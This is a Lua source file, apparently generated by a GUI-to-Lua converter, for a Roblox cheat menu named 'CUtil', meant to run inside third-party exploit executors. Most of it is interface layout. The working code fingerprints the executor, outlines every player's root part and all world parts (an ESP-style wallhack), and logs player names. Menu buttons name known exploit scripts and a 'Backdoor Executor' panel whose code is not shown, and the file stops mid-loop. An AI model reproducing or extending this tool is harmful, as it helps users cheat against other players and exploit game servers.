-- Gui to Lua
-- Version: 3.6

-- Instances:

local ctil = Instance.new("ScreenGui")
local base = Instance.new("Frame")
local maincontents = Instance.new("Frame")
local logexecname = Instance.new("TextButton")
local outlineallhrp = Instance.new("TextButton")
local logallplrs = Instance.new("TextButton")
local logallplrswnohrp = Instance.new("TextButton")
local TextLabel = Instance.new("TextLabel")
local TextLabel_2 = Instance.new("TextLabel")
local outlineallparts = Instance.new("TextButton")
local ScrollingFrame = Instance.new("ScrollingFrame")
local TextBox = Instance.new("TextBox")
local TextLabel_3 = Instance.new("TextLabel")
local iy = Instance.new("TextButton")
local na = Instance.new("TextButton")
local rox6 = Instance.new("TextButton")
local fbyp = Instance.new("TextButton")
local TextButton = Instance.new("TextButton")
local TextLabel_4 = Instance.new("TextLabel")
local bckdooor = Instance.new("Frame")
local maincontents_2 = Instance.new("Frame")
local ScrollingFrame_2 = Instance.new("ScrollingFrame")
local TextBox_2 = Instance.new("TextBox")
local TextLabel_5 = Instance.new("TextLabel")
local backdoorLabel = Instance.new("TextLabel")
local cls = Instance.new("TextButton")
local inj = Instance.new("TextButton")
local exe = Instance.new("TextButton")
local TextButton_2 = Instance.new("TextButton")
local TextLabel_6 = Instance.new("TextLabel")
local msg = Instance.new("Frame")
local TextLabel_7 = Instance.new("TextLabel")
local TextButton_3 = Instance.new("TextButton")
local Frame = Instance.new("Frame")
local MESSAGE = Instance.new("TextLabel")
local TextButton_4 = Instance.new("TextButton")

-- Properties:

ctil.Name = "ctil"
ctil.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui")
ctil.ZIndexBehavior = Enum.ZIndexBehavior.Sibling
ctil.ResetOnSpawn = false

base.Name = "base"
base.Parent = ctil
base.BackgroundColor3 = Color3.fromRGB(40, 40, 40)
base.BorderColor3 = Color3.fromRGB(0, 0, 0)
base.Position = UDim2.new(0.126112759, 0, 0.345477372, 0)
base.Size = UDim2.new(0, 574, 0, 28)

maincontents.Name = "maincontents"
maincontents.Parent = base
maincontents.BackgroundColor3 = Color3.fromRGB(53, 53, 53)
maincontents.BorderColor3 = Color3.fromRGB(0, 0, 0)
maincontents.Position = UDim2.new(0, 0, 0.977057338, 0)
maincontents.Size = UDim2.new(0, 574, 0, 350)

logexecname.Name = "logexecname"
logexecname.Parent = maincontents
logexecname.BackgroundColor3 = Color3.fromRGB(45, 45, 45)
logexecname.BorderColor3 = Color3.fromRGB(0, 0, 0)
logexecname.Position = UDim2.new(0.00890416838, 0, 0.0490848199, 0)
logexecname.Size = UDim2.new(0, 223, 0, 15)
logexecname.Font = Enum.Font.Arial
logexecname.Text = "Log Executor Name"
logexecname.TextColor3 = Color3.fromRGB(255, 255, 255)
logexecname.TextSize = 14.000

outlineallhrp.Name = "outlineallhrp"
outlineallhrp.Parent = maincontents
outlineallhrp.BackgroundColor3 = Color3.fromRGB(45, 45, 45)
outlineallhrp.BorderColor3 = Color3.fromRGB(0, 0, 0)
outlineallhrp.Position = UDim2.new(0.00727248751, 0, 0.297321439, 0)
outlineallhrp.Size = UDim2.new(0, 223, 0, 15)
outlineallhrp.Font = Enum.Font.Arial
outlineallhrp.Text = "Outline Alll HRP (HumanoidRootPart)"
outlineallhrp.TextColor3 = Color3.fromRGB(255, 255, 255)
outlineallhrp.TextSize = 14.000

logallplrs.Name = "logallplrs"
logallplrs.Parent = maincontents
logallplrs.BackgroundColor3 = Color3.fromRGB(45, 45, 45)
logallplrs.BorderColor3 = Color3.fromRGB(0, 0, 0)
logallplrs.Position = UDim2.new(0.00890416838, 0, 0.122544646, 0)
logallplrs.Size = UDim2.new(0, 223, 0, 15)
logallplrs.Font = Enum.Font.Arial
logallplrs.Text = "Log All Players"
logallplrs.TextColor3 = Color3.fromRGB(255, 255, 255)
logallplrs.TextSize = 14.000

logallplrswnohrp.Name = "logallplrswnohrp"
logallplrswnohrp.Parent = maincontents
logallplrswnohrp.BackgroundColor3 = Color3.fromRGB(45, 45, 45)
logallplrswnohrp.BorderColor3 = Color3.fromRGB(0, 0, 0)
logallplrswnohrp.Position = UDim2.new(0.00890416838, 0, 0.187433034, 0)
logallplrswnohrp.Size = UDim2.new(0, 223, 0, 15)
logallplrswnohrp.Font = Enum.Font.Arial
logallplrswnohrp.Text = "Log All Players With No HRP"
logallplrswnohrp.TextColor3 = Color3.fromRGB(255, 255, 255)
logallplrswnohrp.TextSize = 14.000

TextLabel.Parent = maincontents
TextLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel.BackgroundTransparency = 1.000
TextLabel.BorderColor3 = Color3.fromRGB(0, 0, 0)
TextLabel.BorderSizePixel = 0
TextLabel.Position = UDim2.new(-0.000690340588, 0, 0, 0)
TextLabel.Size = UDim2.new(0, 239, 0, 18)
TextLabel.Font = Enum.Font.Arial
TextLabel.Text = "Log"
TextLabel.TextColor3 = Color3.fromRGB(255, 255, 255)
TextLabel.TextSize = 14.000

TextLabel_2.Parent = maincontents
TextLabel_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_2.BackgroundTransparency = 1.000
TextLabel_2.BorderColor3 = Color3.fromRGB(0, 0, 0)
TextLabel_2.BorderSizePixel = 0
TextLabel_2.Position = UDim2.new(-0.00613775477, 0, 0.24660714, 0)
TextLabel_2.Size = UDim2.new(0, 239, 0, 18)
TextLabel_2.Font = Enum.Font.Arial
TextLabel_2.Text = "Outline"
TextLabel_2.TextColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_2.TextSize = 14.000

outlineallparts.Name = "outlineallparts"
outlineallparts.Parent = maincontents
outlineallparts.BackgroundColor3 = Color3.fromRGB(45, 45, 45)
outlineallparts.BorderColor3 = Color3.fromRGB(0, 0, 0)
outlineallparts.Position = UDim2.new(0.00727248751, 0, 0.358593762, 0)
outlineallparts.Size = UDim2.new(0, 223, 0, 15)
outlineallparts.Font = Enum.Font.Arial
outlineallparts.Text = "Outline Alll Parts"
outlineallparts.TextColor3 = Color3.fromRGB(255, 255, 255)
outlineallparts.TextSize = 14.000

ScrollingFrame.Parent = maincontents
ScrollingFrame.Active = true
ScrollingFrame.BackgroundColor3 = Color3.fromRGB(65, 65, 65)
ScrollingFrame.BorderColor3 = Color3.fromRGB(0, 0, 0)
ScrollingFrame.Position = UDim2.new(0.722996533, 0, 0.00183541432, 0)
ScrollingFrame.Size = UDim2.new(0, 159, 0, 349)
ScrollingFrame.ScrollBarImageColor3 = Color3.fromRGB(0, 0, 0)

TextBox.Parent = ScrollingFrame
TextBox.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextBox.BackgroundTransparency = 1.000
TextBox.BorderColor3 = Color3.fromRGB(0, 0, 0)
TextBox.BorderSizePixel = 0
TextBox.Size = UDim2.new(0, 146, 1, 0)
TextBox.ClearTextOnFocus = false
TextBox.Font = Enum.Font.RobotoMono
TextBox.MultiLine = true
TextBox.Text = ""
TextBox.TextColor3 = Color3.fromRGB(255, 255, 255)
TextBox.TextSize = 14.000
TextBox.TextWrapped = true
TextBox.TextXAlignment = Enum.TextXAlignment.Left
TextBox.TextYAlignment = Enum.TextYAlignment.Top

TextLabel_3.Parent = maincontents
TextLabel_3.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_3.BackgroundTransparency = 1.000
TextLabel_3.BorderColor3 = Color3.fromRGB(0, 0, 0)
TextLabel_3.BorderSizePixel = 0
TextLabel_3.Position = UDim2.new(-0.000911274052, 0, 0.423750013, 0)
TextLabel_3.Size = UDim2.new(0, 239, 0, 18)
TextLabel_3.Font = Enum.Font.Arial
TextLabel_3.Text = "Scripts"
TextLabel_3.TextColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_3.TextSize = 14.000

iy.Name = "iy"
iy.Parent = maincontents
iy.BackgroundColor3 = Color3.fromRGB(45, 45, 45)
iy.BorderColor3 = Color3.fromRGB(0, 0, 0)
iy.Position = UDim2.new(0.00727248751, 0, 0.475736618, 0)
iy.Size = UDim2.new(0, 223, 0, 15)
iy.Font = Enum.Font.Arial
iy.Text = "Infinite Yield"
iy.TextColor3 = Color3.fromRGB(255, 255, 255)
iy.TextSize = 14.000

na.Name = "na"
na.Parent = maincontents
na.BackgroundColor3 = Color3.fromRGB(45, 45, 45)
na.BorderColor3 = Color3.fromRGB(0, 0, 0)
na.Position = UDim2.new(0.00727248751, 0, 0.53573662, 0)
na.Size = UDim2.new(0, 223, 0, 15)
na.Font = Enum.Font.Arial
na.Text = "Nameless Admin"
na.TextColor3 = Color3.fromRGB(255, 255, 255)
na.TextSize = 14.000

rox6.Name = "rox6"
rox6.Parent = maincontents
rox6.BackgroundColor3 = Color3.fromRGB(45, 45, 45)
rox6.BorderColor3 = Color3.fromRGB(0, 0, 0)
rox6.Position = UDim2.new(0.00727248751, 0, 0.60145092, 0)
rox6.Size = UDim2.new(0, 223, 0, 15)
rox6.Font = Enum.Font.Arial
rox6.Text = "Ro-Xploit 6.0"
rox6.TextColor3 = Color3.fromRGB(255, 255, 255)
rox6.TextSize = 14.000

fbyp.Name = "fbyp"
fbyp.Parent = maincontents
fbyp.BackgroundColor3 = Color3.fromRGB(45, 45, 45)
fbyp.BorderColor3 = Color3.fromRGB(0, 0, 0)
fbyp.Position = UDim2.new(0.00727248751, 0, 0.661450922, 0)
fbyp.Size = UDim2.new(0, 223, 0, 15)
fbyp.Font = Enum.Font.Arial
fbyp.Text = "Backdoor Executor"
fbyp.TextColor3 = Color3.fromRGB(255, 255, 255)
fbyp.TextSize = 14.000

TextButton.Parent = base
TextButton.BackgroundColor3 = Color3.fromRGB(255, 0, 0)
TextButton.BorderColor3 = Color3.fromRGB(0, 0, 0)
TextButton.BorderSizePixel = 0
TextButton.Position = UDim2.new(0.94773519, 0, -0.0357142873, 0)
TextButton.Size = UDim2.new(0, 30, 0, 28)
TextButton.Font = Enum.Font.SourceSans
TextButton.Text = "x"
TextButton.TextColor3 = Color3.fromRGB(255, 255, 255)
TextButton.TextSize = 25.000
TextButton.TextStrokeTransparency = 0.000

TextLabel_4.Parent = base
TextLabel_4.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_4.BackgroundTransparency = 1.000
TextLabel_4.BorderColor3 = Color3.fromRGB(0, 0, 0)
TextLabel_4.BorderSizePixel = 0
TextLabel_4.Size = UDim2.new(0, 543, 0, 27)
TextLabel_4.Font = Enum.Font.Arial
TextLabel_4.Text = "CUtil"
TextLabel_4.TextColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_4.TextSize = 19.000

bckdooor.Name = "bckdooor"
bckdooor.Parent = ctil
bckdooor.BackgroundColor3 = Color3.fromRGB(40, 40, 40)
bckdooor.BorderColor3 = Color3.fromRGB(0, 0, 0)
bckdooor.Position = UDim2.new(0, 0, 0, 5)
bckdooor.Size = UDim2.new(0, 574, 0, 28)
bckdooor.Visible = false

maincontents_2.Name = "maincontents"
maincontents_2.Parent = bckdooor
maincontents_2.BackgroundColor3 = Color3.fromRGB(53, 53, 53)
maincontents_2.BorderColor3 = Color3.fromRGB(0, 0, 0)
maincontents_2.Position = UDim2.new(0, 0, 0.977057338, 0)
maincontents_2.Size = UDim2.new(0, 574, 0, 350)

ScrollingFrame_2.Parent = maincontents_2
ScrollingFrame_2.Active = true
ScrollingFrame_2.BackgroundColor3 = Color3.fromRGB(65, 65, 65)
ScrollingFrame_2.BorderColor3 = Color3.fromRGB(0, 0, 0)
ScrollingFrame_2.Position = UDim2.new(0.0278745648, 0, 0.0446925573, 0)
ScrollingFrame_2.Size = UDim2.new(0, 487, 0, 258)
ScrollingFrame_2.ScrollBarImageColor3 = Color3.fromRGB(0, 0, 0)

TextBox_2.Parent = ScrollingFrame_2
TextBox_2.BackgroundColor3 = Color3.fromRGB(47, 47, 47)
TextBox_2.BorderColor3 = Color3.fromRGB(0, 0, 0)
TextBox_2.BorderSizePixel = 0
TextBox_2.Position = UDim2.new(-0.00205335673, 0, 0, 0)
TextBox_2.Size = UDim2.new(0.671555102, 146, 14.7648582, 0)
TextBox_2.ClearTextOnFocus = false
TextBox_2.Font = Enum.Font.RobotoMono
TextBox_2.MultiLine = true
TextBox_2.Text = ""
TextBox_2.TextColor3 = Color3.fromRGB(255, 255, 255)
TextBox_2.TextSize = 14.000
TextBox_2.TextWrapped = true
TextBox_2.TextXAlignment = Enum.TextXAlignment.Left
TextBox_2.TextYAlignment = Enum.TextYAlignment.Top

TextLabel_5.Parent = ScrollingFrame_2
TextLabel_5.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_5.BackgroundTransparency = 1.000
TextLabel_5.BorderColor3 = Color3.fromRGB(0, 0, 0)
TextLabel_5.BorderSizePixel = 0
TextLabel_5.Position = UDim2.new(0, 0, -2.95712965e-08, 0)
TextLabel_5.Size = UDim2.new(0, 472, 0, 253)
TextLabel_5.Font = Enum.Font.RobotoMono
TextLabel_5.Text = ""
TextLabel_5.TextColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_5.TextSize = 14.000
TextLabel_5.TextXAlignment = Enum.TextXAlignment.Left
TextLabel_5.TextYAlignment = Enum.TextYAlignment.Top

backdoorLabel.Name = "backdoorLabel"
backdoorLabel.Parent = maincontents_2
backdoorLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
backdoorLabel.BackgroundTransparency = 1.000
backdoorLabel.BorderColor3 = Color3.fromRGB(0, 0, 0)
backdoorLabel.BorderSizePixel = 0
backdoorLabel.Position = UDim2.new(0.699437141, 0, 0.806607127, 0)
backdoorLabel.Size = UDim2.new(0, 159, 0, 27)
backdoorLabel.Font = Enum.Font.Arial
backdoorLabel.Text = "BACKDOOR: nil"
backdoorLabel.TextColor3 = Color3.fromRGB(255, 255, 255)
backdoorLabel.TextScaled = true
backdoorLabel.TextSize = 14.000
backdoorLabel.TextWrapped = true

cls.Name = "cls"
cls.Parent = maincontents_2
cls.BackgroundColor3 = Color3.fromRGB(45, 45, 45)
cls.BorderColor3 = Color3.fromRGB(0, 0, 0)
cls.Position = UDim2.new(0.139676675, 0, 0.821450889, 0)
cls.Size = UDim2.new(0, 58, 0, 48)
cls.Font = Enum.Font.Arial
cls.Text = "CLS"
cls.TextColor3 = Color3.fromRGB(255, 255, 255)
cls.TextSize = 19.000

inj.Name = "inj"
inj.Parent = maincontents_2
inj.BackgroundColor3 = Color3.fromRGB(45, 45, 45)
inj.BorderColor3 = Color3.fromRGB(0, 0, 0)
inj.Position = UDim2.new(0.592638314, 0, 0.821450889, 0)
inj.Size = UDim2.new(0, 58, 0, 48)
inj.Font = Enum.Font.Arial
inj.Text = "INJ"
inj.TextColor3 = Color3.fromRGB(255, 255, 255)
inj.TextSize = 19.000

exe.Name = "exe"
exe.Parent = maincontents_2
exe.BackgroundColor3 = Color3.fromRGB(45, 45, 45)
exe.BorderColor3 = Color3.fromRGB(0, 0, 0)
exe.Position = UDim2.new(0.0264362469, 0, 0.821450889, 0)
exe.Size = UDim2.new(0, 58, 0, 48)
exe.Font = Enum.Font.Arial
exe.Text = "EXE"
exe.TextColor3 = Color3.fromRGB(255, 255, 255)
exe.TextSize = 19.000

TextButton_2.Parent = bckdooor
TextButton_2.BackgroundColor3 = Color3.fromRGB(255, 0, 0)
TextButton_2.BorderColor3 = Color3.fromRGB(0, 0, 0)
TextButton_2.BorderSizePixel = 0
TextButton_2.Position = UDim2.new(0.94773519, 0, -0.0357142873, 0)
TextButton_2.Size = UDim2.new(0, 30, 0, 28)
TextButton_2.Font = Enum.Font.SourceSans
TextButton_2.Text = "x"
TextButton_2.TextColor3 = Color3.fromRGB(255, 255, 255)
TextButton_2.TextSize = 25.000
TextButton_2.TextStrokeTransparency = 0.000

TextLabel_6.Parent = bckdooor
TextLabel_6.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_6.BackgroundTransparency = 1.000
TextLabel_6.BorderColor3 = Color3.fromRGB(0, 0, 0)
TextLabel_6.BorderSizePixel = 0
TextLabel_6.Position = UDim2.new(0, 0, 0.0357142873, 0)
TextLabel_6.Size = UDim2.new(0, 543, 0, 27)
TextLabel_6.Font = Enum.Font.Arial
TextLabel_6.Text = "Backdoor Executor"
TextLabel_6.TextColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_6.TextSize = 19.000

msg.Name = "msg"
msg.Parent = ctil
msg.BackgroundColor3 = Color3.fromRGB(40, 40, 40)
msg.BorderColor3 = Color3.fromRGB(0, 0, 0)
msg.Position = UDim2.new(0.218435317, 0, 0.167085424, 0)
msg.Size = UDim2.new(0, 335, 0, 25)
msg.Visible = false

TextLabel_7.Parent = msg
TextLabel_7.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_7.BackgroundTransparency = 1.000
TextLabel_7.BorderColor3 = Color3.fromRGB(0, 0, 0)
TextLabel_7.BorderSizePixel = 0
TextLabel_7.Size = UDim2.new(0, 306, 0, 25)
TextLabel_7.Font = Enum.Font.Arial
TextLabel_7.Text = "CUtil Message:"
TextLabel_7.TextColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_7.TextSize = 19.000

TextButton_3.Parent = msg
TextButton_3.BackgroundColor3 = Color3.fromRGB(255, 0, 0)
TextButton_3.BorderColor3 = Color3.fromRGB(0, 0, 0)
TextButton_3.BorderSizePixel = 0
TextButton_3.Position = UDim2.new(0.900929928, 0, 0, 0)
TextButton_3.Size = UDim2.new(0, 33, 0, 25)
TextButton_3.Font = Enum.Font.SourceSans
TextButton_3.Text = "x"
TextButton_3.TextColor3 = Color3.fromRGB(255, 255, 255)
TextButton_3.TextSize = 25.000
TextButton_3.TextStrokeTransparency = 0.000

Frame.Parent = msg
Frame.BackgroundColor3 = Color3.fromRGB(53, 53, 53)
Frame.BorderColor3 = Color3.fromRGB(0, 0, 0)
Frame.Position = UDim2.new(0, 0, 1, 0)
Frame.Size = UDim2.new(0, 334, 0, 161)

MESSAGE.Name = "MESSAGE"
MESSAGE.Parent = Frame
MESSAGE.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
MESSAGE.BackgroundTransparency = 1.000
MESSAGE.BorderColor3 = Color3.fromRGB(0, 0, 0)
MESSAGE.BorderSizePixel = 0
MESSAGE.Position = UDim2.new(0.0419161692, 0, 0.0745341629, 0)
MESSAGE.Size = UDim2.new(0, 281, 0, 84)
MESSAGE.Font = Enum.Font.Arial
MESSAGE.Text = ""
MESSAGE.TextColor3 = Color3.fromRGB(255, 255, 255)
MESSAGE.TextSize = 29.000
MESSAGE.TextXAlignment = Enum.TextXAlignment.Left
MESSAGE.TextYAlignment = Enum.TextYAlignment.Top

TextButton_4.Parent = Frame
TextButton_4.BackgroundColor3 = Color3.fromRGB(38, 38, 38)
TextButton_4.BorderColor3 = Color3.fromRGB(0, 0, 0)
TextButton_4.Position = UDim2.new(0.029940119, 0, 0.83229816, 0)
TextButton_4.Size = UDim2.new(0, 311, 0, 21)
TextButton_4.Font = Enum.Font.Arial
TextButton_4.Text = "OK"
TextButton_4.TextColor3 = Color3.fromRGB(255, 255, 255)
TextButton_4.TextSize = 19.000

-- Module Scripts:

local fake_module_scripts = {}

do -- nil.mod
	local script = Instance.new('ModuleScript', nil)
	script.Name = "mod"
	local function module_script()
		local highlighter = {}
		local keywords = {
			lua = {
				"and", "break", "or", "else", "elseif", "if", "then", "until", "repeat", "while", "do", "for", "in", "end",
				"local", "return", "function", "export"
			},
			rbx = {
				"game", "workspace", "script", "math", "string", "table", "task", "wait", "select", "next", "Enum",
				"error", "warn", "tick", "assert", "shared", "loadstring", "tonumber", "tostring", "type",
				"typeof", "unpack", "print", "Instance", "CFrame", "Vector3", "Vector2", "Color3", "UDim", "UDim2", "Ray", "BrickColor",
				"OverlapParams", "RaycastParams", "Axes", "Random", "Region3", "Rect", "TweenInfo",
				"collectgarbage", "not", "utf8", "pcall", "xpcall", "_G", "setmetatable", "getmetatable", "os", "pairs", "ipairs"
			},
			operators = {
				"#", "+", "-", "*", "%", "/", "^", "=", "~", "=", "<", ">", ",", ".", "(", ")", "{", "}", "[", "]", ";", ":"
			}
		}
		
		local colors = {
			numbers         = Color3.fromRGB(181, 206, 168),
			boolean         = Color3.fromRGB(86, 156, 214),
			operator        = Color3.fromRGB(212, 212, 212),
			lua             = Color3.fromRGB(197, 134, 192), -- TS keywords
			rbx             = Color3.fromRGB(78, 201, 176),  -- TS types/modules
			str             = Color3.fromRGB(206, 145, 120),
			comment         = Color3.fromRGB(106, 153, 85),
			null            = Color3.fromRGB(86, 156, 214),
			call            = Color3.fromRGB(220, 220, 170),
			self_call       = Color3.fromRGB(220, 220, 170),
			local_color     = Color3.fromRGB(197, 134, 192),
			function_color  = Color3.fromRGB(220, 220, 170),
			self_color      = Color3.fromRGB(156, 220, 254),
			local_property  = Color3.fromRGB(156, 220, 254),
		}
		
		
		local function createKeywordSet(keywords)
			local keywordSet = {}
			for _, keyword in ipairs(keywords) do
				keywordSet[keyword] = true
			end
			return keywordSet
		end
		
		local luaSet = createKeywordSet(keywords.lua)
		local rbxSet = createKeywordSet(keywords.rbx)
		local operatorsSet = createKeywordSet(keywords.operators)
		
		local function getHighlight(tokens, index)
			local token = tokens[index]
		
			if colors[token .. "_color"] then
				return colors[token .. "_color"]
			end
		
			if tonumber(token) then
				return colors.numbers
			elseif token == "nil" then
				return colors.null
			elseif token:sub(1, 2) == "--" then
				return colors.comment
			elseif operatorsSet[token] then
				return colors.operator
			elseif luaSet[token] then
				return colors.rbx
			elseif rbxSet[token] then
				return colors.lua
			elseif token:sub(1, 1) == "\"" or token:sub(1, 1) == "\'" then
				return colors.str
			elseif token == "true" or token == "false" then
				return colors.boolean
			end
		
			if tokens[index + 1] == "(" then
				if tokens[index - 1] == ":" then
					return colors.self_call
				end
		
				return colors.call
			end
		
			if tokens[index - 1] == "." then
				if tokens[index - 2] == "Enum" then
					return colors.rbx
				end
		
				return colors.local_property
			end
		end
		
		function highlighter.run(source)
			local tokens = {}
			local currentToken = ""
		
			local inString = false
			local inComment = false
			local commentPersist = false
		
			for i = 1, #source do
				local character = source:sub(i, i)
		
				if inComment then
					if character == "\n" and not commentPersist then
						table.insert(tokens, currentToken)
						table.insert(tokens, character)
						currentToken = ""
		
						inComment = false
					elseif source:sub(i - 1, i) == "]]" and commentPersist then
						currentToken ..= "]"
		
						table.insert(tokens, currentToken)
						currentToken = ""
		
						inComment = false
						commentPersist = false
					else
						currentToken = currentToken .. character
					end
				elseif inString then
					if character == inString and source:sub(i-1, i-1) ~= "\\" or character == "\n" then
						currentToken = currentToken .. character
						inString = false
					else
						currentToken = currentToken .. character
					end
				else
					if source:sub(i, i + 1) == "--" then
						table.insert(tokens, currentToken)
						currentToken = "-"
						inComment = true
						commentPersist = source:sub(i + 2, i + 3) == "[["
					elseif character == "\"" or character == "\'" then
						table.insert(tokens, currentToken)
						currentToken = character
						inString = character
					elseif operatorsSet[character] then
						table.insert(tokens, currentToken)
						table.insert(tokens, character)
						currentToken = ""
					elseif character:match("[%w_]") then
						currentToken = currentToken .. character
					else
						table.insert(tokens, currentToken)
						table.insert(tokens, character)
						currentToken = ""
					end
				end
			end
		
			table.insert(tokens, currentToken)
		
			local highlighted = {}
		
			for i, token in ipairs(tokens) do
				local highlight = getHighlight(tokens, i)
		
				if highlight then
					local syntax = string.format("<font color = \"#%s\">%s</font>", highlight:ToHex(), token:gsub("<", "&lt;"):gsub(">", "&gt;"))
		
					table.insert(highlighted, syntax)
				else
					table.insert(highlighted, token)
				end
			end
		
			return table.concat(highlighted)
		end
		
		return highlighter
	end
	fake_module_scripts[script] = module_script
end
do -- ctil.apiextra
	local script = Instance.new('ModuleScript', ctil)
	script.Name = "apiextra"
	local function module_script()
		local api = {}
		
		function api.log(...)
			local message = table.concat({...}, " ")
			print(message)
		
			local txtlogBase = contents.ScrollingFrame.TextBox
			txtlogBase.Text = txtlogBase.Text .. "\n" .. message
		end
		
		function api.messageBox(... : string)
			script.Parent.msg.Visible = true
			local box = script.Parent.msg
			box.Frame.MESSAGE.Text = ...
		end
		
		function api.getIfCusCilentEnv()
			local exec_name = (getexecutor or getexecutorname or getidentityexecutor or identifyexecutor or function() return 'Unknown' end)()
			return exec_name
		end
		
		function api.getgenv()
			local env1 = _G
			local env2 = getfenv(2)
			return env1 or env2
		end
		
		function api.getobjs(rbxassetid:string)
			if api.getIfCusCilentEnv() then
				return game:GetObjects(rbxassetid) --rbxassetid://1234567890
			else
				return nil
			end
		end
		
		return api
	end
	fake_module_scripts[script] = module_script
end


-- Scripts:

local function TKEGFK_fake_script() -- base.LocalScript 
	local script = Instance.new('LocalScript', base)
	local req = require
	local require = function(obj)
		local fake = fake_module_scripts[obj]
		if fake then
			return fake()
		end
		return req(obj)
	end

	local UserInputService = game:GetService("UserInputService")
	
	local gui = script.Parent
	
	local dragging
	local dragInput
	local dragStart
	local startPos
	
	local function update(input)
		local delta = input.Position - dragStart
		gui.Position = UDim2.new(startPos.X.Scale, startPos.X.Offset + delta.X, startPos.Y.Scale, startPos.Y.Offset + delta.Y)
	end
	
	gui.InputBegan:Connect(function(input)
		if input.UserInputType == Enum.UserInputType.MouseButton1 or input.UserInputType == Enum.UserInputType.Touch then
			dragging = true
			dragStart = input.Position
			startPos = gui.Position
			
			input.Changed:Connect(function()
				if input.UserInputState == Enum.UserInputState.End then
					dragging = false
				end
			end)
		end
	end)
	
	gui.InputChanged:Connect(function(input)
		if input.UserInputType == Enum.UserInputType.MouseMovement or input.UserInputType == Enum.UserInputType.Touch then
			dragInput = input
		end
	end)
	
	UserInputService.InputChanged:Connect(function(input)
		if input == dragInput and dragging then
			update(input)
		end
	end)
	
end
coroutine.wrap(TKEGFK_fake_script)()
local function WBRXVX_fake_script() -- TextButton.LocalScript 
	local script = Instance.new('LocalScript', TextButton)
	local req = require
	local require = function(obj)
		local fake = fake_module_scripts[obj]
		if fake then
			return fake()
		end
		return req(obj)
	end

	local on = false
	
	script.Parent.MouseButton1Click:Connect(function()
		if on == false then
			on = true
			script.Parent.Parent.maincontents.Visible = false
			script.Parent.BackgroundColor3 =Color3.new(0,1,0)
			script.Parent.Text = 'o'
		else
			on = false
			script.Parent.Parent.maincontents.Visible = true
			script.Parent.BackgroundColor3 = Color3.new(1,0,0)
			script.Parent.Text = 'x'
		end
	end)
end
coroutine.wrap(WBRXVX_fake_script)()
local function LIBOLM_fake_script() -- ctil.main 
	local script = Instance.new('LocalScript', ctil)
	local req = require
	local require = function(obj)
		local fake = fake_module_scripts[obj]
		if fake then
			return fake()
		end
		return req(obj)
	end

	-- CUtil main script!
	local base = script.Parent.base
	local gui = script.Parent
	local contents = base.maincontents
	
	local outlinedallhrp = false
	local outlinedallparts = false
	
	local api = require(script.Parent.apiextra)
	
	local function log(...)
		local message = table.concat({...}, " ")
		print(message)
	
		local txtlogBase = contents.ScrollingFrame.TextBox
		txtlogBase.Text = txtlogBase.Text .. "\n" .. message
	end
	
	local function messageBox(... : string)
		script.Parent.msg.Visible = true
		local box = script.Parent.msg
		box.Frame.MESSAGE.Text = ...
	end
	
	local function getIfCusCilentEnv()
		local exec_name = (getexecutor or getexecutorname or getidentityexecutor or identifyexecutor or function() return 'Unknown' end)()
		return exec_name
	end
	
	local function getgenv()
		local env1 = _G
		local env2 = getfenv(2)
		return env1 or env2
	end
	
	log('Welcome to CUtil, This is the CUtil Logs.')
	
	log('Getting Executor...')
	
	local msg
	
	if getIfCusCilentEnv() == 'Delta' then
		msg = '[OP] Delta, 100sUnc'
	else
		msg = '[IDK] ' .. getIfCusCilentEnv()
	end
	
	log(msg)
	
	
	contents.logexecname.MouseButton1Click:Connect(function()
		log('Executor Name: ' .. getIfCusCilentEnv())
	end)
	
	
	
	contents.outlineallhrp.MouseButton1Click:Connect(function()
		if outlinedallhrp == false then
			outlinedallhrp = true
			contents.outlineallhrp.Text = 'Unoutline All HumanoidRootPart'
	
			for _, v in pairs(workspace:GetDescendants()) do
				if v.Name == "HumanoidRootPart" and v:IsA("BasePart") then
					local highlight = Instance.new('SelectionBox')
					highlight.Color3 = v.Color
					highlight.Adornee = v
					highlight.Name = "CUtil_HRP_Highlight"
					highlight.Parent = v
					highlight:Clone().Parent= v
					highlight:Clone().Parent = v
				end
			end
			game.Players.PlayerAdded:Connect(function(plr)
				local chr = plr.Character
				local v = chr:WaitForChild('HumanoidRootPart')
				local highlight = Instance.new('SelectionBox')
				highlight.Color3 = v.Color
				highlight.Adornee = v
				highlight.Name = "CUtil_HRP_Highlight"
				highlight.Parent = v
				highlight:Clone().Parent= v
				highlight:Clone().Parent = v
			end)
		else
			outlinedallhrp = false
			contents.outlineallhrp.Text = 'Outline All HumanoidRootPart'
	
			for _, v in pairs(workspace:GetDescendants()) do
				if v:IsA("SelectionBox") and v.Name == "CUtil_HRP_Highlight" then
					v:Destroy()
				end
			end
		end
	end)
	
	contents.logallplrs.MouseButton1Click:Connect(function()
		log('\nAll players:')
		for _, v in pairs(game.Players:GetPlayers()) do
			log(v.DisplayName .. " (@" .. v.Name .. ")")
		end
	end)
	
	contents.logallplrswnohrp.MouseButton1Click:Connect(function()
		log('\nAll players with no HRP:')
		for _, v in pairs(game.Players:GetPlayers()) do
			if not v.Character:FindFirstChild("HumanoidRootPart") then
				log(v.DisplayName .. " (@" .. v.Name .. ")")
			end
		end
	end)
	
	contents.outlineallparts.MouseButton1Click:Connect(function()
		if outlinedallparts == false then
			for _, v in pairs(workspace:GetDescendants()) do
				if v:IsA("BasePart") then
					local highlight = Instance.new('SelectionBox')
					highlight.Color3 = v.Color
					highlight.Adornee = v
					highlight.Name = "CUtil_Part_Highlight"
					highlight.Parent = v
					highlight:Clone().Parent= v
					highlight:Clone().Parent = v
				end
			end
			outlinedallparts = true
			contents.outlineallparts.Text = 'Unoutline All Parts'
		else
			for _, v in pairs(workspace:GetDescendants()) do
